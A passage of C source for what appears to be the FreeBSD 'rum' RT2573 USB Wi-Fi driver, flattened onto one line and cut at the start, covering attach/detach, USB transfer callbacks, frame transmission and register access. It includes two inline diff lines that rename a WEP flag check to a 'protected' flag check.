.endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = (MCLBYTES + RT2573_RX_DESC_SIZE), .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = rum_bulk_read_callback, }, }; static int rum_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != 0) return (ENXIO); if (uaa->info.bIfaceIndex != RT2573_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(rum_devs, sizeof(rum_devs), uaa)); } static int rum_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct rum_softc *sc = device_get_softc(self); struct ieee80211com *ic; struct ifnet *ifp; uint8_t iface_index, bands; uint32_t tmp; int error, ntries; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); iface_index = RT2573_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, rum_config, RUM_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } RUM_LOCK(sc); /* retrieve RT2573 rev. no */ for (ntries = 0; ntries < 100; ntries++) { if ((tmp = rum_read(sc, RT2573_MAC_CSR0)) != 0) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for chip to settle\n"); RUM_UNLOCK(sc); goto detach; } /* retrieve MAC address and various other things from EEPROM */ rum_read_eeprom(sc); device_printf(sc->sc_dev, "MAC/BBP RT2573 (rev 0x%05x), RF %s\n", tmp, rum_get_rf(sc->rf_rev)); rum_load_microcode(sc, rt2573_ucode, sizeof(rt2573_ucode)); RUM_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "rum", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rum_init; ifp->if_ioctl = rum_ioctl; ifp->if_start = rum_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_HOSTAP /* HostAp mode supported */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* bg scanning supported */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2573_RF_5225 || sc->rf_rev == RT2573_RF_5226) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_update_promisc = rum_update_promisc; ic->ic_raw_xmit = rum_raw_xmit; ic->ic_scan_start = rum_scan_start; ic->ic_scan_end = rum_scan_end; ic->ic_set_channel = rum_set_channel; ic->ic_vap_create = rum_vap_create; ic->ic_vap_delete = rum_vap_delete; ic->ic_update_mcast = rum_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2573_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2573_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: rum_detach(self); return (ENXIO); /* failure */ } static int rum_detach(device_t self) { struct rum_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; /* Prevent further ioctls */ RUM_LOCK(sc); sc->sc_detached = 1; RUM_UNLOCK(sc); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, RUM_N_TRANSFER); /* free TX list, if any */ RUM_LOCK(sc); rum_unsetup_tx_list(sc); RUM_UNLOCK(sc); if (ifp) { ic = ifp->if_l2com; ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static usb_error_t rum_do_request(struct rum_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); if (rum_pause(sc, hz / 100)) break; } return (err); } static struct ieee80211vap * rum_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct rum_softc *sc = ic->ic_ifp->if_softc; struct rum_vap *rvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; rvp = (struct rum_vap *) malloc(sizeof(struct rum_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(rvp, M_80211_VAP); return (NULL); } /* override state transition machine */ rvp->newstate = vap->iv_newstate; vap->iv_newstate = rum_newstate; usb_callout_init_mtx(&rvp->ratectl_ch, &sc->sc_mtx, 0); TASK_INIT(&rvp->ratectl_task, 0, rum_ratectl_task, rvp); ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void rum_vap_delete(struct ieee80211vap *vap) { struct rum_vap *rvp = RUM_VAP(vap); struct ieee80211com *ic = vap->iv_ic; usb_callout_drain(&rvp->ratectl_ch); ieee80211_draintask(ic, &rvp->ratectl_task); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } static void rum_tx_free(struct rum_tx_data *data, int txerr) { struct rum_softc *sc = data->sc; if (data->m != NULL) { if (data->m->m_flags & M_TXCB) ieee80211_process_callback(data->ni, data->m, txerr ? ETIMEDOUT : 0); m_freem(data->m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; } STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } static void rum_setup_tx_list(struct rum_softc *sc) { struct rum_tx_data *data; int i; sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); for (i = 0; i < RUM_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; data->sc = sc; STAILQ_INSERT_TAIL(&sc->tx_free, data, next); sc->tx_nfree++; } } static void rum_unsetup_tx_list(struct rum_softc *sc) { struct rum_tx_data *data; int i; /* make sure any subsequent use of the queues will fail */ sc->tx_nfree = 0; STAILQ_INIT(&sc->tx_q); STAILQ_INIT(&sc->tx_free); /* free up all node references and mbufs */ for (i = 0; i < RUM_TX_LIST_COUNT; i++) { data = &sc->tx_data[i]; if (data->m != NULL) { m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } } } static int rum_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rum_vap *rvp = RUM_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct rum_softc *sc = ic->ic_ifp->if_softc; const struct ieee80211_txparam *tp; enum ieee80211_state ostate; struct ieee80211_node *ni; uint32_t tmp; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); RUM_LOCK(sc); usb_callout_stop(&rvp->ratectl_ch); switch (nstate) { case IEEE80211_S_INIT: if (ostate == IEEE80211_S_RUN) { /* abort TSF synchronization */ tmp = rum_read(sc, RT2573_TXRX_CSR9); rum_write(sc, RT2573_TXRX_CSR9, tmp & ~0x00ffffff); } break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); if (vap->iv_opmode != IEEE80211_M_MONITOR) { if (ic->ic_bsschan == IEEE80211_CHAN_ANYC) { RUM_UNLOCK(sc); IEEE80211_LOCK(ic); ieee80211_free_node(ni); return (-1); } rum_update_slot(ic->ic_ifp); rum_enable_mrr(sc); rum_set_txpreamble(sc); rum_set_basicrates(sc); IEEE80211_ADDR_COPY(sc->sc_bssid, ni->ni_bssid); rum_set_bssid(sc, sc->sc_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS) rum_prepare_beacon(sc, vap); if (vap->iv_opmode != IEEE80211_M_MONITOR) rum_enable_tsf_sync(sc); else rum_enable_tsf(sc); /* enable automatic rate adaptation */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) rum_ratectl_start(sc, ni); ieee80211_free_node(ni); break; default: break; } RUM_UNLOCK(sc); IEEE80211_LOCK(ic); return (rvp->newstate(vap, nstate, arg)); } static void rum_bulk_write_callback(struct usb_xfer *xfer, usb_error_t error) { struct rum_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211vap *vap; struct rum_tx_data *data; struct mbuf *m; struct usb_page_cache *pc; unsigned int len; int actlen, sumlen; usbd_xfer_status(xfer, &actlen, &sumlen, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(11, "transfer complete, %d bytes\n", actlen); /* free resources */ data = usbd_xfer_get_priv(xfer); rum_tx_free(data, 0); usbd_xfer_set_priv(xfer, NULL); ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: data = STAILQ_FIRST(&sc->tx_q); if (data) { STAILQ_REMOVE_HEAD(&sc->tx_q, next); m = data->m; if (m->m_pkthdr.len > (int)(MCLBYTES + RT2573_TX_DESC_SIZE)) { DPRINTFN(0, "data overflow, %u bytes\n", m->m_pkthdr.len); m->m_pkthdr.len = (MCLBYTES + RT2573_TX_DESC_SIZE); } pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_in(pc, 0, &data->desc, RT2573_TX_DESC_SIZE); usbd_m_copy_in(pc, RT2573_TX_DESC_SIZE, m, 0, m->m_pkthdr.len); vap = data->ni->ni_vap; if (ieee80211_radiotap_active_vap(vap)) { struct rum_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = data->rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m); } /* align end on a 4-bytes boundary */ len = (RT2573_TX_DESC_SIZE + m->m_pkthdr.len + 3) & ~3; if ((len % 64) == 0) len += 4; DPRINTFN(11, "sending frame len=%u xferlen=%u\n", m->m_pkthdr.len, len); usbd_xfer_set_frame_len(xfer, 0, len); usbd_xfer_set_priv(xfer, data); usbd_transfer_submit(xfer); } RUM_UNLOCK(sc); rum_start(ifp); RUM_LOCK(sc); break; default: /* Error */ DPRINTFN(11, "transfer error, %s\n", usbd_errstr(error)); ifp->if_oerrors++; data = usbd_xfer_get_priv(xfer); if (data != NULL) { rum_tx_free(data, error); usbd_xfer_set_priv(xfer, NULL); } if (error != USB_ERR_CANCELLED) { if (error == USB_ERR_TIMEOUT) device_printf(sc->sc_dev, "device timeout\n"); /* * Try to clear stall first, also if other * errors occur, hence clearing stall * introduces a 50 ms delay: */ usbd_xfer_set_stall(xfer); goto tr_setup; } break; } } static void rum_bulk_read_callback(struct usb_xfer *xfer, usb_error_t error) { struct rum_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_node *ni; struct mbuf *m = NULL; struct usb_page_cache *pc; uint32_t flags; uint8_t rssi = 0; int len; usbd_xfer_status(xfer, &len, NULL, NULL, NULL); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: DPRINTFN(15, "rx done, actlen=%d\n", len); if (len < (int)(RT2573_RX_DESC_SIZE + IEEE80211_MIN_LEN)) { DPRINTF("%s: xfer too short %d\n", device_get_nameunit(sc->sc_dev), len); ifp->if_ierrors++; goto tr_setup; } len -= RT2573_RX_DESC_SIZE; pc = usbd_xfer_get_frame(xfer, 0); usbd_copy_out(pc, 0, &sc->sc_rx_desc, RT2573_RX_DESC_SIZE); rssi = rum_get_rssi(sc, sc->sc_rx_desc.rssi); flags = le32toh(sc->sc_rx_desc.flags); if (flags & RT2573_RX_CRC_ERROR) { /* * This should not happen since we did not * request to receive those frames when we * filled RUM_TXRX_CSR2: */ DPRINTFN(5, "PHY or CRC error\n"); ifp->if_ierrors++; goto tr_setup; } m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { DPRINTF("could not allocate mbuf\n"); ifp->if_ierrors++; goto tr_setup; } usbd_copy_out(pc, RT2573_RX_DESC_SIZE, mtod(m, uint8_t *), len); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (flags >> 16) & 0xfff; if (ieee80211_radiotap_active(ic)) { struct rum_rx_radiotap_header *tap = &sc->sc_rxtap; /* XXX read tsf */ tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(sc->sc_rx_desc.rate, (flags & RT2573_RX_OFDM) ? IEEE80211_T_OFDM : IEEE80211_T_CCK); tap->wr_antsignal = RT2573_NOISE_FLOOR + rssi; tap->wr_antnoise = RT2573_NOISE_FLOOR; tap->wr_antenna = sc->rx_ant; } /* FALLTHROUGH */ case USB_ST_SETUP: tr_setup: usbd_xfer_set_frame_len(xfer, 0, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * At the end of a USB callback it is always safe to unlock * the private mutex of a device! That is why we do the * "ieee80211_input" here, and not some lines up! */ RUM_UNLOCK(sc); if (m) { ni = ieee80211_find_rxnode(ic, mtod(m, struct ieee80211_frame_min *)); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, RT2573_NOISE_FLOOR); ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, RT2573_NOISE_FLOOR); } if ((ifp->if_drv_flags & IFF_DRV_OACTIVE) == 0 && !IFQ_IS_EMPTY(&ifp->if_snd)) rum_start(ifp); RUM_LOCK(sc); return; default: /* Error */ if (error != USB_ERR_CANCELLED) { /* try to clear stall first */ usbd_xfer_set_stall(xfer); goto tr_setup; } return; } } static uint8_t rum_plcp_signal(int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 14 Table 80) */ case 12: return 0xb; case 18: return 0xf; case 24: return 0xa; case 36: return 0xe; case 48: return 0x9; case 72: return 0xd; case 96: return 0x8; case 108: return 0xc; /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return 0x0; case 4: return 0x1; case 11: return 0x2; case 22: return 0x3; } return 0xff; /* XXX unsupported/unknown rate */ } static void rum_setup_tx_desc(struct rum_softc *sc, struct rum_tx_desc *desc, uint32_t flags, uint16_t xflags, int len, int rate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t plcp_length; int remainder; desc->flags = htole32(flags); desc->flags |= htole32(RT2573_TX_VALID); desc->flags |= htole32(len << 16); desc->xflags = htole16(xflags); desc->wme = htole16(RT2573_QID(0) | RT2573_AIFSN(2) | RT2573_LOGCWMIN(4) | RT2573_LOGCWMAX(10)); /* setup PLCP fields */ desc->plcp_signal = rum_plcp_signal(rate); desc->plcp_service = 4; len += IEEE80211_CRC_LEN; if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) { desc->flags |= htole32(RT2573_TX_OFDM); plcp_length = len & 0xfff; desc->plcp_length_hi = plcp_length >> 6; desc->plcp_length_lo = plcp_length & 0x3f; } else { plcp_length = (16 * len + rate - 1) / rate; if (rate == 22) { remainder = (16 * len) % 22; if (remainder != 0 && remainder < 7) desc->plcp_service |= RT2573_PLCP_LENGEXT; } desc->plcp_length_hi = plcp_length >> 8; desc->plcp_length_lo = plcp_length & 0xff; if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->plcp_signal |= 0x08; } } static int rum_sendprot(struct rum_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_frame *wh; struct rum_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort; uint16_t dur; RUM_LOCK_ASSERT(sc, MA_OWNED); KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RT2573_TX_MORE_FRAG; if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RT2573_TX_NEED_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return (ENOBUFS); } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = mprot; data->ni = ieee80211_ref_node(ni); data->rate = protrate; rum_setup_tx_desc(sc, &data->desc, flags, 0, mprot->m_pkthdr.len, protrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return 0; } static int rum_tx_mgt(struct rum_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rum_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; uint32_t flags = 0; uint16_t dur; RUM_LOCK_ASSERT(sc, MA_OWNED); data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } wh = mtod(m0, struct ieee80211_frame *); } tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2573_TX_NEED_ACK; dur = ieee80211_ack_duration(ic->ic_rt, tp->mgmtrate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_RESP)) flags |= RT2573_TX_TIMESTAMP; } data->m = m0; data->ni = ni; data->rate = tp->mgmtrate; rum_setup_tx_desc(sc, &data->desc, flags, 0, m0->m_pkthdr.len, tp->mgmtrate); DPRINTFN(10, "sending mgt frame len=%d rate=%d\n", m0->m_pkthdr.len + (int)RT2573_TX_DESC_SIZE, tp->mgmtrate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return (0); } static int rum_tx_raw(struct rum_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct rum_tx_data *data; uint32_t flags; int rate, error; RUM_LOCK_ASSERT(sc, MA_OWNED); KASSERT(params != NULL, ("no raw xmit params")); rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { m_freem(m0); return EINVAL; } flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= RT2573_TX_NEED_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = rum_sendprot(sc, m0, ni, params->ibp_flags & IEEE80211_BPF_RTS ? IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RT2573_TX_LONG_RETRY | RT2573_TX_IFS_SIFS; } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; /* XXX need to setup descriptor ourself */ rum_setup_tx_desc(sc, &data->desc, flags, 0, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending raw frame len=%u rate=%u\n", m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return 0; } static int rum_tx_data(struct rum_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rum_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; uint32_t flags = 0; uint16_t dur; int error, rate; RUM_LOCK_ASSERT(sc, MA_OWNED); wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else rate = ni->ni_txrate; - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = rum_sendprot(sc, m0, ni, prot, rate); if (error || sc->tx_nfree == 0) { m_freem(m0); return ENOBUFS; } flags |= RT2573_TX_LONG_RETRY | RT2573_TX_IFS_SIFS; } } data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; data->m = m0; data->ni = ni; data->rate = rate; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2573_TX_NEED_ACK; flags |= RT2573_TX_MORE_FRAG; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); USETW(wh->i_dur, dur); } rum_setup_tx_desc(sc, &data->desc, flags, 0, m0->m_pkthdr.len, rate); DPRINTFN(10, "sending frame len=%d rate=%d\n", m0->m_pkthdr.len + (int)RT2573_TX_DESC_SIZE, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[RUM_BULK_WR]); return 0; } static void rum_start(struct ifnet *ifp) { struct rum_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; RUM_LOCK(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { RUM_UNLOCK(sc); return; } for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->tx_nfree < RUM_TX_MINFREE) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (rum_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } } RUM_UNLOCK(sc); } static int rum_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rum_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; RUM_LOCK(sc); error = sc->sc_detached ? ENXIO : 0; RUM_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: RUM_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rum_init_locked(sc); startall = 1; } else rum_setpromisc(sc); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rum_stop(sc); } RUM_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void rum_eeprom_read(struct rum_softc *sc, uint16_t addr, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2573_READ_EEPROM; USETW(req.wValue, 0); USETW(req.wIndex, addr); USETW(req.wLength, len); error = rum_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not read EEPROM: %s\n", usbd_errstr(error)); } } static uint32_t rum_read(struct rum_softc *sc, uint16_t reg) { uint32_t val; rum_read_multi(sc, reg, &val, sizeof val); return le32toh(val); } static void rum_read_multi(struct rum_softc *sc, uint16_t reg, void *buf, int len) { struct usb_device_request req; usb_error_t error; req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = RT2573_READ_MULTI_MAC; USETW(req.wValue, 0); USETW(req.wIndex, reg); USETW(req.wLength, len); error = rum_do_request(sc, &req, buf); if (error != 0) { device_printf(sc->sc_dev, "could not multi read MAC register: %s\n", usbd_errstr(error)); } } static usb_error_t rum_write(struct rum_softc *sc, uint16_t reg, uint32_t val) { uint32_t tmp = htole32(val); return (rum_write_multi(sc, reg, &tmp, sizeof tmp)); } static usb_error_t rum_write_multi(struct rum_softc *sc, uint16_t reg, void *buf, size_t len) { struct usb_device_request req; usb_error_t error; size_t offset; req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = RT2573_WRITE_MULTI_MAC; USETW(req.wValue, 0); /* write at most 64 bytes at a time */ for (offset = 0; offset < len; offset += 64) { USETW(req.wIndex, reg + offset); USETW(req.wLength, MIN(len - offset, 64)); error = rum_do_request(sc, &req, (char *)buf + offset); if (error != 0) { device_printf(sc->sc_dev, "could not multi write MAC register: %s\n", usbd_errstr(error)); return (error); } } return (USB_ERR_NORMAL_COMPLETION); } static void rum_bbp_write(struct rum_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; DPRINTFN(2, "reg=0x%08x\n", reg); for (ntries = 0; ntries < 100; ntries++) { if (!(rum_read(sc, RT2573_PHY_CSR3) & RT2573_BBP_BUSY)) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = RT2573_BBP_BUSY | (reg & 0x7f) << 8 | val; rum_write(sc, RT2573_PHY_CSR3, tmp); } static uint8_t rum_bbp_read(struct rum_softc *sc, uint8_t reg) { uint32_t val; int ntries; DPRINTFN(2, "reg=0x%08x\n", reg); for (ntries = 0; ntries < 100; ntries++) { if (!(rum_read(sc, RT2573_PHY_CSR3) & RT2573_BBP_BUSY)) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not read BBP\n"); return 0; } val = RT2573_BBP_BUSY | RT2573_BBP_READ | reg << 8; rum_write(sc, RT2573_PHY_CSR3, val); for (ntries = 0; ntries < 100; ntries++) { val = rum_read(sc, RT2573_PHY_CSR3); if (!(val & RT2573_BBP_BUSY)) return val & 0xff; if (rum_pause(sc, hz / 100)) break; } device_printf(sc->sc_dev, "could not read BBP\n"); return 0; } static void rum_rf_write(struct rum_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(rum_read(sc, RT2573_PHY_CSR4) & RT2573_RF_BUSY)) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT2573_RF_BUSY | RT2573_RF_20BIT | (val & 0xfffff) << 2 | (reg & 3); rum_write(sc, RT2573_PHY_CSR4, tmp); /* remember last written value in sc */ sc->rf_regs[reg] = val; 